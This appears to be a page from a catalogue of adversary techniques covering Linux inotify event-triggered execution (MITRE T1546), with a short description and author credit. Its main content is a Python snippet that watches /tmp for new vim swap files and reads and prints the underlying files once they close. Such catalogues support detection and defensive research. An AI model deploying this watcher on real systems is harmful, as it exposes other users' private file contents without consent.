Event Triggered Execution: Linux Inotify

Created the Monday 18 November 2024. Updated 2 days, 20 hours ago.

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries.

Technique Identifiers

U1245 T1546

Code Snippets

Description

The attached code snippet will trigger after a file creation event occurs within the /tmp directory. It will read the contents of the newly created file.

import inotify.adapters
import psutil

def main():
    i = inotify.adapters.Inotify()

    i.add_watch("/tmp")

    for event in i.event_gen(yield_nones=False):
        (_, type_names, path, filename) = event
        if "IN_CREATE" in type_names:
            fullPath = path + "/" + filename 
            # Testing to see if its a swp file that was created
            if fullPath.split("/")[-1].startswith(".") and fullPath.split("/")[-1].endswith(".swp"):
                newPath = path + "/" + fullPath.split("/")[-1][1:].replace(".swp", "")

            elif fullPath.split("/")[-1].startswith(".") and fullPath.split("/")[-1].endswith(".swx"):
                newPath = path + "/" + fullPath.split("/")[-1][1:].replace(".swx", "")

            while isOpen(fullPath) == True:
                pass

            f = open(newPath, 'r')
            data = f.readlines()
            print(f"[+] Contents of {newPath}: {data}")


def isOpen(path):
    for proc in psutil.process_iter():
        try:
            for item in proc.open_files():
                if path == item.path:
                    return True
        except Exception:
            pass
    return False

if __name__ == '__main__':
    main()

About Author Open Snippet

Author: Issac Briones (1d8) / Target Platform: Linux

Contributor

Issac Briones (1d8)

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

Event Triggered Execution, Technique T1546 - Enterprise | MITRE ATT&CK®